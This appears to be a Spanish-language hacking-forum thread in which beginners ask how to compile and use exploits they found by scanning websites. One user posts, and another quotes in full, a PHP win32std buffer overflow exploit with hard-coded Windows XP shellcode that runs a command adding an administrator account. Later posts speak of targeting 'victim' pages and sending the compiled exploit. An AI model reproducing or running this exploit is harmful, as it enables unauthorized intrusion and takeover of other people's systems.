Compilación e interpretación de Exploits || Tutorial Securityfocus: Buscando inf

[Zuko0]

Pues no me compila...



La extensión está correcta y todo correcto...

A mi me pasa exactamente lo mismo, es mas, ya postie un tema al respecto, salu2

[kentshy]

Hola yo scannee una pag  cn el SSS y me dio este exploit:

<?php

##########################################################
###----------------------------------------------------###
###--------PHP win32std Buffer Overflow Exploit--------###
###----------------------------------------------------###
###-Tested on:-PHP 5.2.3-------------------------------###
###------------Windows XP SP2 Eng----------------------###
###----------------------------------------------------###
###-Note:-Shellcode is hard coded for Win XP SP2 Eng---###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################



#Add user:    [user]=>"adm1n" [password]=>"netjackal"
$SC=
"\xEB\x19\x5A\x31\xC0\x50\x88\x42\x52\x52\xBB\x6D\x13\x86".
"\x7C\xFF\xD3\xBB\xDA\xCD\x81\x7C\x31\xC0\x50\xFF\xD3\xE8".
"\xE2\xFF\xFF\xFF\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63".
"\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6D\x31".
"\x6E\x20\x6E\x65\x74\x6A\x61\x63\x6B\x61\x6C\x20\x2F\x61".
"\x64\x64\x26\x26\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67".
"\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72".
"\x61\x74\x6F\x72\x73\x20\x2F\x61\x64\x64\x20\x61\x64\x6D".
"\x31\x6E\x58";

$RET="\x70\xE6\x16\x01";

$BOMB=str_repeat("\x90",24).$SC.str_repeat("A",121).$RET;

win_browse_fil e(1,NULL,$BOMB,NULL,array( "*" => "*.*"));
?>


Como lo compilo en php??

[WaesWaes]

Hola yo scannee una pag  cn el SSS y me dio este exploit:

<?php

##########################################################
###----------------------------------------------------###
###--------PHP win32std Buffer Overflow Exploit--------###
###----------------------------------------------------###
###-Tested on:-PHP 5.2.3-------------------------------###
###------------Windows XP SP2 Eng----------------------###
###----------------------------------------------------###
###-Note:-Shellcode is hard coded for Win XP SP2 Eng---###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################



#Add user:    [user]=>"adm1n" [password]=>"netjackal"
$SC=
"\xEB\x19\x5A\x31\xC0\x50\x88\x42\x52\x52\xBB\x6D\x13\x86".
"\x7C\xFF\xD3\xBB\xDA\xCD\x81\x7C\x31\xC0\x50\xFF\xD3\xE8".
"\xE2\xFF\xFF\xFF\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63".
"\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6D\x31".
"\x6E\x20\x6E\x65\x74\x6A\x61\x63\x6B\x61\x6C\x20\x2F\x61".
"\x64\x64\x26\x26\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67".
"\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72".
"\x61\x74\x6F\x72\x73\x20\x2F\x61\x64\x64\x20\x61\x64\x6D".
"\x31\x6E\x58";

$RET="\x70\xE6\x16\x01";

$BOMB=str_repeat("\x90",24).$SC.str_repeat("A",121).$RET;

win_browse_fil e(1,NULL,$BOMB,NULL,array( "*" => "*.*"));
?>


Como lo compilo en php??

:O por favor lee lo minimo antes de preguntar

[kentshy]

Entonces eso para  q sirve es un exploit?

[WaesWaes]

del tipo Buffer Overflow

[N_e_O_n]

tengo una pregunta... hice todos los pasos del SSS y de cuando quiero seguir los pasos de este, me fijo que no se en que lo tengo que compilar
este es el primer renglon
!/bin/bash

si me ayudan estare MUY agradecido JAJAJA
 

[WaesWaes]

leete todo esto

http://www.zonasiete.org/manual/ch07.html

hay que dedicarle un minimo a la programacion

salu2

[N_e_O_n]

Gracias ya empece
 

[uriel_mec]

yo tengo conocimientos en programacion en C, por lo tanto poseo un mismo compilador. Es el Turbo C++, me supongo que si compilo ahi mismo el codigo del Exploit debe funcionar igual no?, nadamas que tengo una duda, lei el manual acerca de como compilar en C, casi todo esta en el entorno de ms-dos, entonces si compilo el Exploit y lo guardo como ejecutable, cada que quiera usar yo el mismo exploit tendria que abrir el ejecutable para explotar las vulnerabilidad es de la pagina victima?

[0zX]

10.000 Visitas  

[WaesWaes]

10.000 Visitas  

xDD que raro justo este tema xDD

[vampigab]

HOLA ME TUVE QUE REGISTRAR PARA PARA QUITARME LA DUDA AUNQUE YO SE QUE DEBES ESTAR ARTO DE PERSONAS COMO YO PERO NO QUIERO QUEDARME CON LA DUDA YA LEI EL MANUAL COMO 5 VCES Y ME QUEDO PEGADO DONDE TODOS QUEDAN YA LO INSTALE DOS VECES YA METI TODOS LOS ARCHIVOS QUE ME FALTAVAN YO ESTOY SEGURO QUE LO ESTOY HACIENDO BIEN SERA LAS VULNERABILIDAD ES DE LA PAGINA QUE NO ESTOY TOMANDO LAS CORRECTAS PERO YA ME ASEGURE QUE SEAN C ALGUN CONSEJO DE CUAL LIBRERIA ESCOJER? :

[Th666_HaCk]

HOLA ME TUVE QUE REGISTRAR PARA PARA QUITARME LA DUDA AUNQUE YO SE QUE DEBES ESTAR ARTO DE PERSONAS COMO YO PERO NO QUIERO QUEDARME CON LA DUDA YA LEI EL MANUAL COMO 5 VCES Y ME QUEDO PEGADO DONDE TODOS QUEDAN YA LO INSTALE DOS VECES YA METI TODOS LOS ARCHIVOS QUE ME FALTAVAN YO ESTOY SEGURO QUE LO ESTOY HACIENDO BIEN SERA LAS VULNERABILIDAD ES DE LA PAGINA QUE NO ESTOY TOMANDO LAS CORRECTAS PERO YA ME ASEGURE QUE SEAN C ALGUN CONSEJO DE CUAL LIBRERIA ESCOJER? :

Favor de no escribir en mayuscula

[vampigab]

ups caps sry pero una es una forma de espresar frustracion 

[KillMan]

Ya arregle el problema de la libreria...

Exploit Compilado!

Ahora no se como enviarlo.

La dirección del exploit es: http://www.securityfocus.com/bid/8732/exploit
Para ver este enlace Registrate o Inicia Sesion